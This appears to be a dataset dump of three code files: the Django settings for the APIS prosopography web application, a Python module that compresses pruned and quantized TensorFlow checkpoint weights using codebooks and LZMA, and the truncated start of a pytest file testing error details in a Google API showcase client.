APIS_API_EXCLUDE_SETS = True # exclude reverse links to entities
APIS_LIST_VIEWS_ALLOWED = False
APIS_DETAIL_VIEWS_ALLOWED = False
MAX_AGE = 60*60
APIS_LIST_VIEW_TEMPLATE = "browsing/generic_list.html"
APIS_DELETE_VIEW_TEMPLATE = "webpage/confirm_delete.html"
APIS_IIIF_WORK_KIND = "IIIF"
APIS_IIIF_ENT_IIIF_REL = "has iiif image"
APIS_IIIF_SERVER = "https://iiif.acdh.oeaw.ac.at/"
APIS_OSD_JS = (
"https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/openseadragon.min.js"
)
APIS_OSD_IMG_PREFIX = (
"https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/images/"
) | apis/settings/base.py | import os
from typing import Dict, Any
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.abspath(os.path.join(__file__, "../")))
)
SHARED_URL = "https://shared.acdh.oeaw.ac.at/"
ACDH_IMPRINT_URL = "https://shared.acdh.oeaw.ac.at/acdh-common-assets/api/imprint.php?serviceID="
PROJECT_NAME = "apis"
PROJECT_SHARED = "https://shared.acdh.oeaw.ac.at/apis/"
PROJECT_DEFAULT_MD = {
'title': 'TITLE',
'author': '<NAME>, <NAME>',
'subtitle': 'SUBTITLE',
'description': """This is a default metadata file. To change this, provide\
provide a following file {PROJECT_SHARED}/{PROJECT_NAME}/metadata.json""",
'github': 'https://github.com/acdh-oeaw/apis-webpage-base',
'production instance': None,
'purpose_de': '',
'purpose_en': """""",
'version': ['apis_core', 'charts', 'django'],
'matomo_id': '',
'matomo_url': '',
'imprint': '/imprint',
'social_media': [
('fab fa-twitter', 'https://twitter.com/ACDH_OeAW'),
('fab fa-youtube', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
],
'social_media': [
('fab fa-twitter fa-2x', 'https://twitter.com/ACDH_OeAW'),
('fab fa-youtube fa-2x', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
],
'app_type': 'database',
}
# Application definition
INSTALLED_APPS = [
"dal",
# 'corsheaders',
"dal_select2",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"reversion",
"reversion_compare",
"crispy_forms",
"django_filters",
"django_tables2",
"rest_framework",
"webpage",
"browsing",
"apis_core.apis_entities",
"apis_core.apis_metainfo",
"apis_core.apis_relations",
"apis_core.apis_vocabularies",
"apis_core.apis_labels",
"apis_core.apis_tei",
# 'apis_core.apis_vis',
"rest_framework.authtoken",
#"drf_yasg",
"drf_spectacular",
"guardian",
"charts",
"infos",
"csvexport"
]
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_METHODS = ("GET", "OPTIONS")
SPECTACULAR_SETTINGS: Dict[str, Any] = {
'TITLE': 'APIS generic API',
'DESCRIPTIOPN': 'Provides access to the main APIS data-model endpoints.',
'LICENSE': {'name': 'MIT License', 'url': 'https://www.mit.edu/~amini/LICENSE.md'},
'VERSION': '0.13'
}
CRISPY_TEMPLATE_PACK = "bootstrap3"
REST_FRAMEWORK = {
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 50,
"DEFAULT_PERMISSION_CLASSES": (
#"rest_framework.permissions.DjangoModelPermissions",
#"rest_framework.permissions.IsAuthenticated",
"rest_framework.permissions.DjangoObjectPermissions",
# use IsAuthenticated for every logged in user to have global edit rights
),
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.TokenAuthentication",
"rest_framework.authentication.SessionAuthentication",
"rest_framework.authentication.BasicAuthentication",
),
'DEFAULT_FILTER_BACKENDS': (
'django_filters.rest_framework.DjangoFilterBackend',
'drf_spectacular.contrib.django_filters.DjangoFilterBackend'
),
'DEFAULT_SCHEMA_CLASS': 'drf_spectacular.openapi.AutoSchema',
}
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend", # this is default
"guardian.backends.ObjectPermissionBackend",
)
MIDDLEWARE = [
"corsheaders.middleware.CorsMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"reversion.middleware.RevisionMiddleware",
"crum.CurrentRequestUserMiddleware",
]
ROOT_URLCONF = "apis.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"webpage.webpage_content_processors.installed_apps",
"webpage.webpage_content_processors.is_dev_version",
"webpage.webpage_content_processors.get_db_name",
"webpage.webpage_content_processors.title_img",
"webpage.webpage_content_processors.logo_img",
"webpage.webpage_content_processors.custom_css",
"webpage.webpage_content_processors.shared_url",
"webpage.webpage_content_processors.apis_app_name",
"apis_core.context_processors.custom_context_processors.add_entities",
"apis_core.context_processors.custom_context_processors.add_relations",
"apis_core.context_processors.custom_context_processors.add_apis_settings",
]
},
}
]
WSGI_APPLICATION = "apis.wsgi.application"
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
APIS_BASE_URI = "TO CHANGE"
APIS_MIN_CHAR = 0
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles/")
STATIC_URL = "/static/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media/")
MEDIA_URL = "/media/"
DJANGO_TABLES2_TEMPLATE = "django_tables2/bootstrap4.html"
APIS_COMPONENTS = []
# APIS settings
APIS_TEI_TEXTS = ["xml/tei transcription"]
APIS_CETEICEAN_CSS = "https://teic.github.io/CETEIcean/css/CETEIcean.css"
APIS_CETEICEAN_JS = "https://teic.github.io/CETEIcean/js/CETEI.js"
APIS_NEXT_PREV = True
APIS_ALTERNATE_NAMES = [
"Taufname",
"Ehename",
"Name laut ÖBL XML",
"alternative Namensform",
"alternative name",
"Künstlername",
"Mädchenname",
"Pseudonym",
"weitere Namensform",
]
APIS_RELATIONS_FILTER_EXCLUDE = [
"uri",
"tempentityclass",
"user",
"__id",
"source",
"label",
"temp_entity",
"collection__",
"_ptr",
"baseclass",
"id",
"written",
"relation_type__description",
"relation_type__parent_class",
"relation_type__status",
"relation_type__vocab_name",
"relation_type__name_reverse",
"__text",
"annotation_set_relation",
]
APIS_RELATIONS = {
"list_filters": [("relation_type",)],
"search": ["relation_type__name"],
"exclude": ["name"],
"PersonPlace": {
"labels": ["related_person", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_place__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_place",)],
},
"PersonInstitution": {
"labels": ["related_person", "related_institution", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_institution__name",
],
"list_filters": [
("relation_type",),
("related_person",),
("related_institution",),
],
},
"PersonEvent": {
"labels": ["related_person", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_event__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_event",)],
},
"PersonWork": {
"labels": ["related_person", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_work__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_work",)],
},
"PersonPerson": {
"labels": ["related_personA", "related_personB", "relation_type"],
"search": [
"relation_type__name",
"related_personA__name",
"related_personA__first_name",
"related_personB__name",
"related_personB__first_name",
],
"list_filters": [
("relation_type",),
("related_personA",),
("related_personB",),
],
},
"InstitutionPlace": {
"labels": ["related_institution", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_place__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_place",),
],
},
"InstitutionWork": {
"labels": ["related_institution", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_work__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_work",),
],
},
"InstitutionEvent": {
"labels": ["related_institution", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_event__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_event",),
],
},
"InstitutionInstitution": {
"labels": ["related_institutionA", "related_institutionB", "relation_type"],
"search": [
"relation_type__name",
"related_institutionA__name",
"related_institutionB__name",
],
"list_filters": [
("relation_type",),
("related_institutionA",),
("related_institutionB",),
],
},
"PlaceWork": {
"labels": ["related_work", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_work",)],
},
"PlaceEvent": {
"labels": ["related_event", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_event__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_event",)],
},
"PlacePlace": {
"labels": ["related_placeA", "related_placeB", "relation_type"],
"search": [
"relation_type__name",
"related_placeA__name",
"related_placeB__name",
],
"list_filters": [("relation_type",), ("related_placeA",), ("related_placeB",)],
},
"EventWork": {
"labels": ["related_event", "related_work", "relation_type"],
"search": ["relation_type__name", "related_event__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_event",), ("related_work",)],
},
"EventEvent": {
"labels": ["related_eventA", "related_eventB", "relation_type"],
"search": [
"relation_type__name",
"related_eventA__name",
"related_eventB__name",
],
"list_filters": [("relation_type",), ("related_eventA",), ("related_eventB",)],
},
"WorkWork": {
"labels": ["related_workA", "related_workB", "relation_type"],
"search": ["relation_type__name", "related_workA__name", "related_workB__name"],
"list_filters": [("relation_type",), ("related_workA",), ("related_workB",)],
},
}
APIS_VOCABULARIES = {"exclude": ["userAdded"]}
APIS_METAINFO = {"exclude": ["groups_allowed"]}
APIS_ENTITIES = {
"Place": {
"merge": True,
"search": ["name"],
"form_order": ["name", "kind", "lat", "lng", "status", "collection"],
"table_fields": ["name"],
"additional_cols": ["id", "lat", "lng", "part_of"],
"list_filters": [
{"name": {"method": "name_label_filter"}},
{"collection": {"label": "Collection"}},
{"kind": {"label": "Kind of Place"}},
"related_entity_name",
"related_relationtype_name",
"lat",
"lng",
],
},
"Person": {
"merge": True,
"search": ["name", "first_name"],
"form_order": ["first_name", "name", "start_date_written", "end_date_written", "profession", "status", "collection"],
"table_fields": ["name", "first_name", "start_date_written", "end_date_written"],
"additional_cols": ["id", "profession", "gender"],
"list_filters": [
"name",
{"gender": {"label": "Gender"}},
{"start_date": {"label": "Date of Birth"}},
{"end_date": {"label": "Date of Death"}},
{"profession": {"label": "Profession"}},
{"title": {"label": "Title"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Institution": {
"merge": True,
"search": ["name"],
"form_order": ["name", "start_date_written", "end_date_written", "kind", "status", "collection"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name or label of institution"}},
{"kind": {"label": "Kind of Institution"}},
{"start_date": {"label": "Date of foundation"}},
{"end_date": {"label": "Date of termination"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Work": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name of work"}},
{"kind": {"label": "Kind of Work"}},
{"start_date": {"label": "Date of creation"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Event": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", ],
"list_filters": [
{"name": {"label": "Name of event"}},
{"kind": {"label": "Kind of Event"}},
{"start_date": {"label": "Date of beginning"}},
{"end_date": {"label": "Date of end"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
}
APIS_API_EXCLUDE_SETS = True # exclude reverse links to entities
APIS_LIST_VIEWS_ALLOWED = False
APIS_DETAIL_VIEWS_ALLOWED = False
MAX_AGE = 60*60
APIS_LIST_VIEW_TEMPLATE = "browsing/generic_list.html"
APIS_DELETE_VIEW_TEMPLATE = "webpage/confirm_delete.html"
APIS_IIIF_WORK_KIND = "IIIF"
APIS_IIIF_ENT_IIIF_REL = "has iiif image"
APIS_IIIF_SERVER = "https://iiif.acdh.oeaw.ac.at/"
APIS_OSD_JS = (
"https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/openseadragon.min.js"
)
APIS_OSD_IMG_PREFIX = (
"https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/images/"
) | 0.518546 | 0.172416 |
import tensorflow as tf
import numpy as np
import io
import struct
import lzma
from ._bit_manipulation import BitsAccumulator, BitsReader
def _iter_max_size(values, max_value):
for v in values:
while v >= max_value:
yield max_value - 1
v -= max_value
yield v
def get_bits_for_index(idx_diff):
""" Get the number of bits to use to encode the index.
Currently this uses a simplistic algorithm which attempts to encode the
90th percentile of differences in the index.
Parameters
----------
idx_diff: The list of index differences to encode.
Returns
-------
An integer between 0 and 16 representing the number of bits to use.
"""
percentile_max = np.percentile(idx_diff, 90, interpolation='higher')
if percentile_max == 0:
return 0
return min(int(np.ceil(np.log2(np.percentile(idx_diff, 90, interpolation='higher')))), 16)
def get_index_list(idx_diff, idx_diff_bits=None):
""" Get the list of index differences.
This function splits the values of idx_diff to ensure that all can be encoded
in the given number of bits. In the compression, we split the gaps, and when
one is too long we simply fill in the value with zeros as necessary.
Parameters
----------
idx_diff: The list of index differences to encode.
idx_diff_bits: The number of bits used to encode the index.
Returns
-------
A list of indices such that all can be encoded in the given number of bits.
"""
if idx_diff_bits is None:
idx_diff_bits = get_bits_for_index(idx_diff)
return list(_iter_max_size(idx_diff, 2 ** idx_diff_bits))
def _compress_default(stream, values):
""" Default compression algorithm which uses a fixed number of bits.
Parameters
----------
stream: The OutputWriter into which to write the encoded values.
values: The values to encode.
"""
ba = BitsAccumulator()
num_bits = int(np.ceil(np.log2(np.max(values) + 1)))
num_values = len(values)
stream.write(ba.push(num_bits, num_bits=8))
stream.write(ba.push(num_values, num_bits=32))
for v in values:
stream.write(ba.push(v, num_bits))
stream.write(ba.flush())
def _decompress_default(stream):
""" Default decompression algorithm which uses
Parameters
----------
stream: The stream from which to decompress.
Returns
-------
A list of decoded values.
"""
ba = BitsReader(stream)
num_bits = ba.read(8)
num_values = ba.read(32)
data = np.empty(num_values, dtype=np.uint32)
for i in range(num_values):
data[i] = ba.read(num_bits)
return data
class LzmaCompression:
""" Compression strategy using standard LZMA.
This class applies the standard LZMA compression to the sequence
of bytes obtained by the given strategy.
"""
_filters = [{
'id': lzma.FILTER_LZMA2,
'preset': 9
}]
def __init__(self, compression=None):
if compression is None:
self._compress = _compress_default
self._decompress = _decompress_default
else:
self._compress = compression.compress
self._decompress = compression.decompress
def compress(self, stream, values):
buffer = io.BytesIO()
self._compress(buffer, values)
compressed = lzma.compress(
buffer.getvalue(), format=lzma.FORMAT_RAW, filters=LzmaCompression._filters)
stream.write(struct.pack('!I', len(compressed)))
stream.write(compressed)
def decompress(self, stream):
length = struct.unpack('!I', stream.read(4))[0]
data = stream.read(length)
decompressed = lzma.decompress(data, format=lzma.FORMAT_RAW, filters=LzmaCompression._filters)
return self._decompress(io.BytesIO(decompressed))
class EntropyEstimateCompression:
""" A compression strategy that does not actually compress,
but instead reports the entropy of the values it is given.
This gives a lower bound on the compressed size of the data.
"""
def compress(self, stream, values):
_, counts = np.unique(values, return_counts=True)
length_bits = -np.sum(counts * np.log2(counts / np.sum(counts)))
length_bytes = int(np.ceil(length_bits / 8))
stream.write(b'0' * length_bytes)
def decompress(self, stream):
raise NotImplemented('This strategy does not implement decompression.')
def _get_compression(compressor):
if compressor is None:
return _compress_default
else:
return compressor.compress
def compress_variable(value, output=None,
codebook_dtype=np.float16,
compression_index=None,
compression_weights=None):
""" This function compresses the given variable into
a compressed representation storing the codebook of non-zero
values, indexes of non-zero values and quantized values.
This does not store the shape of the variable, and must be
passed in again to be restored.
The format is given as follows:
- byte 1: the upper 4 bits encode the number of bits used for
the quantized value, the lower 4 bits encode the number of
bits used for the offset.
- short: a short representing the length of the codebook
excluding the zero value (each codebook value is represented
as a single precision floating point number).
- int: an integer representing the number of non-zero elements
stored in the tensor.
- codebook: a sequence of floats in IEE-754 single precision format
corresponding to the codebook in order.
- values: a sequence of pairs of values of given number of bits
in byte 1 representing the offset - 1 and the quantized value.
The number of bytes written is rounded to the nearest byte of the
total code length.
Parameters
----------
value: a numpy array containing the values of the variable
to store. These must be already quantized values.
output: a BytesIO to which to write the compressed representation.
codebook_dtype: a numpy type to indicate the data type to use
to encode codebook values.
compression_index: Whether to use any additional compressor to encode
the indices.
compression_weights: Whether to use any additional compressor to encode
the quantized values.
Returns
-------
bytes: the representation of the variable in compressed format.
"""
if output is None:
output = io.BytesIO()
value = np.ravel(value)
unique_values = np.unique(value)
zero_in_values = False
codebook = {0.0: 0}
codebook_values = []
code = 1
for v in unique_values:
if v != 0:
codebook[v] = code
codebook_values.append(v)
code += 1
else:
zero_in_values = True
if len(codebook) > 2 ** 16:
raise ValueError('Too many distinct values in variable!')
idx = np.flatnonzero(value)
if len(idx) == 0:
output.write(struct.pack('BB', 0, 0))
return output
idx_diff_min_one = np.ediff1d(idx, to_begin=idx[0] + 1) - 1
# Determine number of bits to use for index difference.
num_bits_idx = get_bits_for_index(idx_diff_min_one)
if num_bits_idx == 0 and not zero_in_values:
# We are storing a dense matrix.
codebook.pop(0)
for k in codebook.keys():
codebook[k] = codebook[k] - 1
# Build the actual list of index differences such that they can all
# be represented in the adequate number of bits.
idx_diff_list = get_index_list(idx_diff_min_one, idx_diff_bits=num_bits_idx)
# Encode header information
output.write(struct.pack('!H', len(codebook) - 1))
# Encode codebook
for code_value in codebook_values:
output.write(np.array(code_value, dtype=codebook_dtype).tobytes())
compression_index = _get_compression(compression_index)
compression_weights = _get_compression(compression_weights)
# Encode index diff list
if num_bits_idx != 0:
compression_index(output, idx_diff_list)
code_values = np.zeros(len(idx_diff_list), dtype=np.uint32)
current_idx = -1
for i, d in enumerate(idx_diff_list):
current_idx += d + 1
v = value[current_idx]
code_values[i] = codebook[v]
compression_weights(output, code_values)
return output
def decompress_variable(code, shape, codebook_dtype=np.float16, compression=None):
""" Decompress a variable.
This function is the inverse of the `compress_variable`
function.
To perform the decompression, the original shape of the variable must
be known. In neural networks, this is a property of the model and
is thus not encoded in the code.
Parameters
----------
code: The compressed code representing the variable.
shape: The shape of the variable to decode.
codebook_dtype: The type of the floating point numbers in the codebook.
compression: The type of compression to use.
Returns
-------
data: a numpy array of the given shape representing the decoded
variable information.
"""
if hasattr(code, 'read'):
data = code
else:
data = io.BytesIO(code)
result = np.zeros(np.prod(shape), dtype=np.float32)
br = BitsReader(data)
codebook_len = br.read(16)
codebook = {0: 0.0}
for i in range(codebook_len):
if codebook_dtype is np.float16:
raw = br.read(16).to_bytes(2, byteorder='big')
elif codebook_dtype is np.float32:
raw = br.read(32).to_bytes(4, byteorder='big')
else:
raise ValueError('Invalid codebook data type')
codebook[i + 1] = np.frombuffer(raw, dtype=codebook_dtype, count=1)[0]
if compression is None:
decompress = _decompress_default
else:
decompress = compression.decompress
idx_diff_list = decompress(data)
values = decompress(data)
current_index = -1
for c, d in zip(values, idx_diff_list):
current_index += d + 1
v = codebook[c]
result[current_index] = v
return np.reshape(result, shape)
def compress_checkpoint(checkpoint, variables, compression=None) -> bytes:
""" Obtains a compressed representation of the given variables in the checkpoint.
This function assumes that the weights in the checkpoints have already been pruned
and quantized, and then encodes the checkpoint into an codebook + index + compressed
values.
Parameters
----------
checkpoint: the checkpoint to load the variables from.
variables: the variables to compress.
compression: A compression strategy to use for the codebooks.
Returns
-------
A byte string representing the compressed representation of the tensor.
"""
if isinstance(checkpoint, str):
checkpoint = tf.train.load_checkpoint(checkpoint)
output = io.BytesIO()
for variable_name in variables:
variable_value = checkpoint.get_tensor(variable_name)
compress_variable(variable_value, output, compression_index=compression)
data = output.getvalue()
return data | nnet/compression/coding.py | import tensorflow as tf
import numpy as np
import io
import struct
import lzma
from ._bit_manipulation import BitsAccumulator, BitsReader
def _iter_max_size(values, max_value):
for v in values:
while v >= max_value:
yield max_value - 1
v -= max_value
yield v
def get_bits_for_index(idx_diff):
""" Get the number of bits to use to encode the index.
Currently this uses a simplistic algorithm which attempts to encode the
90th percentile of differences in the index.
Parameters
----------
idx_diff: The list of index differences to encode.
Returns
-------
An integer between 0 and 16 representing the number of bits to use.
"""
percentile_max = np.percentile(idx_diff, 90, interpolation='higher')
if percentile_max == 0:
return 0
return min(int(np.ceil(np.log2(np.percentile(idx_diff, 90, interpolation='higher')))), 16)
def get_index_list(idx_diff, idx_diff_bits=None):
""" Get the list of index differences.
This function splits the values of idx_diff to ensure that all can be encoded
in the given number of bits. In the compression, we split the gaps, and when
one is too long we simply fill in the value with zeros as necessary.
Parameters
----------
idx_diff: The list of index differences to encode.
idx_diff_bits: The number of bits used to encode the index.
Returns
-------
A list of indices such that all can be encoded in the given number of bits.
"""
if idx_diff_bits is None:
idx_diff_bits = get_bits_for_index(idx_diff)
return list(_iter_max_size(idx_diff, 2 ** idx_diff_bits))
def _compress_default(stream, values):
""" Default compression algorithm which uses a fixed number of bits.
Parameters
----------
stream: The OutputWriter into which to write the encoded values.
values: The values to encode.
"""
ba = BitsAccumulator()
num_bits = int(np.ceil(np.log2(np.max(values) + 1)))
num_values = len(values)
stream.write(ba.push(num_bits, num_bits=8))
stream.write(ba.push(num_values, num_bits=32))
for v in values:
stream.write(ba.push(v, num_bits))
stream.write(ba.flush())
def _decompress_default(stream):
""" Default decompression algorithm which uses
Parameters
----------
stream: The stream from which to decompress.
Returns
-------
A list of decoded values.
"""
ba = BitsReader(stream)
num_bits = ba.read(8)
num_values = ba.read(32)
data = np.empty(num_values, dtype=np.uint32)
for i in range(num_values):
data[i] = ba.read(num_bits)
return data
class LzmaCompression:
""" Compression strategy using standard LZMA.
This class applies the standard LZMA compression to the sequence
of bytes obtained by the given strategy.
"""
_filters = [{
'id': lzma.FILTER_LZMA2,
'preset': 9
}]
def __init__(self, compression=None):
if compression is None:
self._compress = _compress_default
self._decompress = _decompress_default
else:
self._compress = compression.compress
self._decompress = compression.decompress
def compress(self, stream, values):
buffer = io.BytesIO()
self._compress(buffer, values)
compressed = lzma.compress(
buffer.getvalue(), format=lzma.FORMAT_RAW, filters=LzmaCompression._filters)
stream.write(struct.pack('!I', len(compressed)))
stream.write(compressed)
def decompress(self, stream):
length = struct.unpack('!I', stream.read(4))[0]
data = stream.read(length)
decompressed = lzma.decompress(data, format=lzma.FORMAT_RAW, filters=LzmaCompression._filters)
return self._decompress(io.BytesIO(decompressed))
class EntropyEstimateCompression:
""" A compression strategy that does not actually compress,
but instead reports the entropy of the values it is given.
This gives a lower bound on the compressed size of the data.
"""
def compress(self, stream, values):
_, counts = np.unique(values, return_counts=True)
length_bits = -np.sum(counts * np.log2(counts / np.sum(counts)))
length_bytes = int(np.ceil(length_bits / 8))
stream.write(b'0' * length_bytes)
def decompress(self, stream):
raise NotImplemented('This strategy does not implement decompression.')
def _get_compression(compressor):
if compressor is None:
return _compress_default
else:
return compressor.compress
def compress_variable(value, output=None,
codebook_dtype=np.float16,
compression_index=None,
compression_weights=None):
""" This function compresses the given variable into
a compressed representation storing the codebook of non-zero
values, indexes of non-zero values and quantized values.
This does not store the shape of the variable, and must be
passed in again to be restored.
The format is given as follows:
- byte 1: the upper 4 bits encode the number of bits used for
the quantized value, the lower 4 bits encode the number of
bits used for the offset.
- short: a short representing the length of the codebook
excluding the zero value (each codebook value is represented
as a single precision floating point number).
- int: an integer representing the number of non-zero elements
stored in the tensor.
- codebook: a sequence of floats in IEE-754 single precision format
corresponding to the codebook in order.
- values: a sequence of pairs of values of given number of bits
in byte 1 representing the offset - 1 and the quantized value.
The number of bytes written is rounded to the nearest byte of the
total code length.
Parameters
----------
value: a numpy array containing the values of the variable
to store. These must be already quantized values.
output: a BytesIO to which to write the compressed representation.
codebook_dtype: a numpy type to indicate the data type to use
to encode codebook values.
compression_index: Whether to use any additional compressor to encode
the indices.
compression_weights: Whether to use any additional compressor to encode
the quantized values.
Returns
-------
bytes: the representation of the variable in compressed format.
"""
if output is None:
output = io.BytesIO()
value = np.ravel(value)
unique_values = np.unique(value)
zero_in_values = False
codebook = {0.0: 0}
codebook_values = []
code = 1
for v in unique_values:
if v != 0:
codebook[v] = code
codebook_values.append(v)
code += 1
else:
zero_in_values = True
if len(codebook) > 2 ** 16:
raise ValueError('Too many distinct values in variable!')
idx = np.flatnonzero(value)
if len(idx) == 0:
output.write(struct.pack('BB', 0, 0))
return output
idx_diff_min_one = np.ediff1d(idx, to_begin=idx[0] + 1) - 1
# Determine number of bits to use for index difference.
num_bits_idx = get_bits_for_index(idx_diff_min_one)
if num_bits_idx == 0 and not zero_in_values:
# We are storing a dense matrix.
codebook.pop(0)
for k in codebook.keys():
codebook[k] = codebook[k] - 1
# Build the actual list of index differences such that they can all
# be represented in the adequate number of bits.
idx_diff_list = get_index_list(idx_diff_min_one, idx_diff_bits=num_bits_idx)
# Encode header information
output.write(struct.pack('!H', len(codebook) - 1))
# Encode codebook
for code_value in codebook_values:
output.write(np.array(code_value, dtype=codebook_dtype).tobytes())
compression_index = _get_compression(compression_index)
compression_weights = _get_compression(compression_weights)
# Encode index diff list
if num_bits_idx != 0:
compression_index(output, idx_diff_list)
code_values = np.zeros(len(idx_diff_list), dtype=np.uint32)
current_idx = -1
for i, d in enumerate(idx_diff_list):
current_idx += d + 1
v = value[current_idx]
code_values[i] = codebook[v]
compression_weights(output, code_values)
return output
def decompress_variable(code, shape, codebook_dtype=np.float16, compression=None):
""" Decompress a variable.
This function is the inverse of the `compress_variable`
function.
To perform the decompression, the original shape of the variable must
be known. In neural networks, this is a property of the model and
is thus not encoded in the code.
Parameters
----------
code: The compressed code representing the variable.
shape: The shape of the variable to decode.
codebook_dtype: The type of the floating point numbers in the codebook.
compression: The type of compression to use.
Returns
-------
data: a numpy array of the given shape representing the decoded
variable information.
"""
if hasattr(code, 'read'):
data = code
else:
data = io.BytesIO(code)
result = np.zeros(np.prod(shape), dtype=np.float32)
br = BitsReader(data)
codebook_len = br.read(16)
codebook = {0: 0.0}
for i in range(codebook_len):
if codebook_dtype is np.float16:
raw = br.read(16).to_bytes(2, byteorder='big')
elif codebook_dtype is np.float32:
raw = br.read(32).to_bytes(4, byteorder='big')
else:
raise ValueError('Invalid codebook data type')
codebook[i + 1] = np.frombuffer(raw, dtype=codebook_dtype, count=1)[0]
if compression is None:
decompress = _decompress_default
else:
decompress = compression.decompress
idx_diff_list = decompress(data)
values = decompress(data)
current_index = -1
for c, d in zip(values, idx_diff_list):
current_index += d + 1
v = codebook[c]
result[current_index] = v
return np.reshape(result, shape)
def compress_checkpoint(checkpoint, variables, compression=None) -> bytes:
""" Obtains a compressed representation of the given variables in the checkpoint.
This function assumes that the weights in the checkpoints have already been pruned
and quantized, and then encodes the checkpoint into an codebook + index + compressed
values.
Parameters
----------
checkpoint: the checkpoint to load the variables from.
variables: the variables to compress.
compression: A compression strategy to use for the codebooks.
Returns
-------
A byte string representing the compressed representation of the tensor.
"""
if isinstance(checkpoint, str):
checkpoint = tf.train.load_checkpoint(checkpoint)
output = io.BytesIO()
for variable_name in variables:
variable_value = checkpoint.get_tensor(variable_name)
compress_variable(variable_value, output, compression_index=compression)
data = output.getvalue()
return data | 0.887443 | 0.661458 |
import pytest
from google import showcase
from google.rpc import error_details_pb2
from google.protobuf import any_pb2
from grpc_status import rpc_status
from google.api_core import exceptions
def create_status(error_details=None):
status = rpc_status.status_pb2.Status()
status.code = 3
status.message = (
"test"
)
status_detail = any_pb2.Any()
if error_details:
status_detail.Pack(error_details)
status.details.append(status_detail)
return status
def test_bad_request_details(echo):
def create_bad_request_details():
bad_request_details = error_details_pb2.BadRequest()
field_violation = bad_request_details.field_violations.add()
field_violation.field = "test field"
field_violation.description = "test description"
return bad_request_details
bad_request_details = create_bad_request_details()
status = create_status(bad_request_details)
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
))
assert e.details == [bad_request_details]
def test_precondition_failure_details(echo):
def create_precondition_failure_details():
pf_details = error_details_pb2.PreconditionFailure()
violation = pf_details.violations.add()
violation.type = "test type"
violation.subject = "test subject"
violation.description = "test description"
return pf_details
pf_details = create_precondition_failure_details()
status = create_status(pf_details)
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
))
assert e.details == [pf_details]
def test_unknown_details(echo):
status = create_status()
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
